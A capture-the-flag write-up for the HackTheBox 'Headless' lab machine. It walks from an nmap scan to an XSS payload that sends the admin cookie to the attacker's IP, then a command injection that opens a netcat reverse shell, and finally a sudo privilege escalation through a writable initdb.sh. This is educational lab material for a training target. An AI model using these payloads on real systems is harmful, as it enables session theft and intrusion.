HackTheBox Headless Writeup
Explore the fundamentals of cybersecurity in the Headless Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.
Add Hosts#
Edit the /etc/hosts file and add the following entries:
10.10.11.8 headless.htb
Script to add hosts automatically#
ip="10.10.11.8"
domain="headless.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV headless.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 18:38 CEST
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open http Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-title: Under Construction
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Port 22: SSH
- Port 5000: Werkzeug HTTP server (Python-based)
Useful URLs:
Exploiting XSS#
echo "\nstart listening from the server\n python -m http.server 5000\nWait until the response appear"
read
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
payload='<script>var i=new Image(); i.src="http://'$vpnip':5000/?cookie="+btoa(document.cookie);</script>'
curl -v -s 'http://headless.htb:5000/support' -X POST -H 'User-Agent: '$payload'' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H "Content-Length: 112" \
-H 'Referer: http://headless.htb:5000/support' \
-H 'Cookie: is_admin='$(curl -sD - http://headless.htb:5000/ | grep -oP '(?<=is_admin=)[^;]+')'' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'fname=test&lname=test&email=test%40headless.htb&phone=0000000000&message=%3Cscript%3Ealert
%281%29%3C%2Fscript%3E'
Wait for the message: "GET /?cookie=". After retrieving the cookie, you can close the listener.
Remote Code Execution (RCE)#
echo -en "\n1st start a listeners\n nc -lvnp 9001\n Admin Coockie Base64 ->"
read coockie
coockiedecrypted=$(echo $coockie | base64 -d)
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
curl -sS 'http://headless.htb:5000/dashboard' -X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H 'Referer: http://headless.htb:5000/dashboard' \
-H 'Cookie: '$coockiedecrypted'' \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'date=2023-09-15;nc+'$vpnip'+9001+-e+/bin/bash'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Privilege Escalation#
After running sudo -l, you may notice the following:
(ALL) NOPASSWD: /usr/bin/syscheck
This means you can run /usr/bin/syscheck with sudo privileges. To exploit this, follow these steps:
Check the content of /usr/bin/syscheck:
cat /usr/bin/syscheck
Exploit the script:
cd /tmp
echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
sudo /usr/bin/syscheck
You should now have root access. Display the root flag:
id
cat /root/root.txt